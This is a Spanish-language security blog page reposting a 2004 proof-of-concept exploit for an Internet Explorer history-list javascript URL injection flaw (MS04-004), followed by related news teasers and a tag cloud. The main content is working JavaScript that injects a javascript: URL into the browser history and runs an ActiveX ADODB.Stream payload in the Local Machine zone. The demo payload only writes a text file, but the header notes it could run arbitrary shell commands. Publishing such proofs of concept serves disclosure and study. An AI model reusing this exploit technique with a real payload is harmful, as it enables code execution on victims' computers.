Internet Explorer url javascript injection in history list (MS04-004)


Andreas Sandblad, 2004-02-03, patched by MS04-004
Purpose: Run payload code called from Local Machine zone.
The code may be arbitrary such as executing shell commands.

This demo simply creates a harmless textfile on the desktop.





function payload() {
file = \"sandblad.txt\";
o = new ActiveXObject(\"ADODB.Stream\");
o.Open();
o.Type=2;
o.Charset=\"ascii\";
o.WriteText(\"You are vulnerable!\");
o.SaveToFile(file, 2);
o.Close();
alert(\"File \"+file+\" created on desktop!\");
}
// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
if (history.length != len)
payload();
else
return \"-onload=external.NavigateAndFind(\'res:\',\'\',\'\')>\";
}
// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
location = \'javascript:\'+trigger+payload+\'trigger(\'+history.length+\')\';
}
// Launch backbutton exploit on load
if (confirm(\"Press OK to run backbutton exploit!\"))
backbutton();


Otras noticias de interés:

Ejecución de código arbitrario en Microsoft Word 2002 y Word 2003
Se ha encontrado una vulnerabilidad en Microsoft Word que puede ser aprovechada por atacantes para comprometer el sistema....
Berners-Lee: Recoger o no la información personal de los usuarios
Tim Berners-Lee, considerado el inventor de la World Wide Web, se ha mostrado favorable a que empresas como Facebook o Google recopilen información personal de sus usuarios siempre y cuando compartan con ellos el uso que hacen de esos datos. ...
Cuidado con la letra pequeña de la virtualización
Los usuarios prestan poca atención a algunas de las partes oscuras de la virtualización cuando tienen prisa por obtener los beneficios que esta tecnología les puede ofrecer, según una consultora....
I Seminario de Tecnología Libre Sucre 2012
Evento a realizarse el proximo 20 de Octubre del presente año en la Biblioteca de la Universidad Politécnica de Paria (UPTP) Carúpano....
Publicada TuxInfo No.15
Ya está disponible para su descarga el número 15 de TuxInfo, excelente revista electronica basada en software libre, en esta oportunidad comentan:...
Videos explicativos de algunas tecnologías para usuarios II
Continuando con los excelentes videos explicativos, en esta oportunidad se presentarán: Que es un Blogs, Que es una Red Social, Que es una Wiki....
Denegación de servicio en RealPlayer
Se ha reportado que este conocido software de RealNetworks, es propenso a una vulnerabilidad del tipo denegación de servicio (DoS), que se puede producir cuando intenta procesar ciertos archivos .MID (archivos midi), especialmente modificados....
1er número de Aprender para Educar con Tecnología
Desde el Instituto Nacional Superior del Profesorado Técnico de la Universidad Tecnológica Nacional de Buenos Aires, Argentina, han lanzado el primer número de la revista online Aprender para Educar con Tecnología, disponible de forma gratuita en...
Informe semanal sobre virus
El informe de hoy sobre códigos maliciosos centra su atención en varios troyanos -Hatoy.A, Petala.A y seis variantes de Istbar-, y tres gusanos -Dozer.A, Simbag.A y Holar.I-....
Infografía Mario vs Sonic
Los amigos de maxijuegos.com han creado una interesante inforgrafía donde comparan estos 2 iconos de los video juegos. Gracias Sara por el aporte....

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploits
  • explorer
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • history
  • hosting
  • informatica
  • injection
  • internet
  • isos
  • javascript
  • libre
  • licencias
  • linux
  • linuxmint
  • list
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • url
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra